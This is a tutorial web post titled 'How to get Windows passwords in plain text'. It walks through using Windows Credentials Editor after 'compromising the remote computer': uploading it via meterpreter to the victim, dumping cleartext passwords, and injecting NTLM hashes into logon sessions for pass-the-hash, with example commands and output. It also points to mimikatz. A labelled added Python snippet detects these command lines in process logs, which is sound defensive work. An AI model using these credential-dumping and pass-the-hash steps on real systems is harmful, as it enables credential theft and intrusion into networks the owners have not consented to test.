HOW TO GET WINDOWS PASSWORDS IN PLAIN TEXT

Windows Credentials Editor (WCE) is a security tool that lists Windows logon sessions and lets you add, change, list and delete the associated credentials (e.g. LM/NT hashes, Kerberos tickets and cleartext passwords).

The tool allows users to:
  • Perform Pass-the-Hash on Windows
  • 'Steal' NTLM credentials from memory (with and without code injection)
  • 'Steal' Kerberos Tickets from Windows machines
  • Use the 'stolen' Kerberos tickets on other Windows or Unix machines to gain access to systems and services
  • Dump cleartext passwords stored by Windows authentication packages
WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing.
After compromising the remote computer, upload WCE to the victim computer using Metasploit:
(1) Type the following command in the meterpreter session:
upload /pentest/passwords/wce/wce.exe .
(2) Now type shell to get a command prompt on the victim PC.
(3) Type wce.exe -w to get the password in clear text.


How To List NTLM Credentials In Memory?


By default, WCE lists the NTLM credentials in memory; there is no need to specify any options.
For example: 
C:\Users\test>wce.exe

How To Change My Current NTLM Credentials?


wce.exe -s <username>:<domain>:<lmhash>:<nthash> 
For example: 
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
Changing NTLM credentials of current logon session (00024E1Bh) to:
Username: testuser 
domain: amplialabs 
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE 
NTHash: 0CB6948805F797BF2A82807973B89537 
NTLM credentials successfully changed!



How To Create A New Logon Session And Launch A Program With New NTLM Credentials?

wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program> 
For example: 
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c cmd.exe 
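
On the defensive side, the -s argument format shown above is a stable thing to look for in process-creation logs. The following is an added example, not part of the original post or of WCE: it scans constructed command lines for the <username>:<domain>:<lmhash>:<nthash> shape and for wce.exe -w. The function names, finding labels and sample paths are assumptions made for illustration.

```python
import re

# Shape of the argument the page passes to "wce.exe -s":
# <username>:<domain>:<lmhash>:<nthash>, both hashes 32 hex characters.
# Matching the shape still fires when the executable has been renamed.
CRED_ARG = re.compile(
    r"(?<!\S)(?P<user>[^\s:]+):(?P<domain>[^\s:]+):"
    r"(?P<lm>[0-9A-Fa-f]{32}):(?P<nt>[0-9A-Fa-f]{32})(?!\S)"
)
# Second half of an LM hash when the password has 7 characters or fewer.
EMPTY_LM_HALF = "AAD3B435B51404EE"

def inspect_command_line(cmdline):
    """Return the findings for one process-creation command line."""
    findings = []
    tokens = cmdline.split()
    image = tokens[0].strip('"').rsplit("\\", 1)[-1].lower() if tokens else ""
    switches = {t.lower() for t in tokens[1:] if t.startswith("-")}
    match = CRED_ARG.search(cmdline)
    if match:
        findings.append("hash-credential-argument user=%s domain=%s"
                        % (match.group("user"), match.group("domain")))
        if match.group("lm").upper().endswith(EMPTY_LM_HALF):
            findings.append("lm-hash-short-password")
    # Weak signal on its own: the file name is trivially changed.
    if image == "wce.exe":
        findings.append("wce-image-name")
        if "-w" in switches:
            findings.append("wce-cleartext-dump-switch")
    return findings

def triage(events):
    """Map each suspicious command line to its findings."""
    return {e: f for e in events if (f := inspect_command_line(e))}

# Constructed sample events; the hash values are the ones printed on this page.
PAGE_CRED = ("testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:"
             "0CB6948805F797BF2A82807973B89537")
SAMPLE_EVENTS = [
    r"C:\Windows\Temp\wce.exe -w",
    r"C:\Users\test\wce.exe -s " + PAGE_CRED + " -c cmd.exe",
    r"C:\Users\test\updater.exe -s " + PAGE_CRED,   # renamed binary
    r"C:\Windows\System32\ipconfig.exe /all",       # benign
]

if __name__ == "__main__":
    for line, found in triage(SAMPLE_EVENTS).items():
        print(found, "<-", line)
```

The hash-shaped argument is the stronger signal because it does not depend on the file name; the image-name check only catches an unrenamed binary.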


How To Generate NTLM Hashes With WCE? 

wce.exe -g <cleartext password> 
For example: 
C:\Users\test>wce.exe -g mypassword 
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 
Use -h for help. 
Password: mypassword 
Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7 

If you want to know more about how it works, download the PDF files below.
(1) PDF 1
(2) PDF 2

If you only need the cleartext password, and not the logon sessions or anything else,
you can use mimikatz to get it.
